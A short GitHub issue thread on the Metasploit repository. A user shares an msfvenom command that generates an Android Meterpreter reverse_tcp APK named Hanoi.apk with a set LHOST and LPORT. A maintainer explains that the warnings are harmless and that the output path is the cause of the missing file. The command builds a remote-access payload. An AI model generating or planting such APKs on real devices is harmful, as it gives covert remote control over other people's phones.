### ISSUE TITLE
what is the problem here? help me please

### ISSUE THREAD

**Issue by faran131yt** [rapid7/metasploit-framework#15712]
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.157 LPORT=9999 -o $Desktop/Hanoi.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10194 bytes
Saved as: /Hanoi.apk

**Comment by timwr** [comment]
There is no problem. You can ignore the warnings about not selecting the platform. /Hanoi.apk was successfully created.

**Comment by faran131yt** [comment]
it says that the file is created but I don't see it

**Comment by timwr** [comment]
`$Desktop/Hanoi.apk` looks sus
Try just `-o Hanoi.apk`, or check if the file is at `$Desktop/Hanoi.apk`, or `/Hanoi.apk` etc
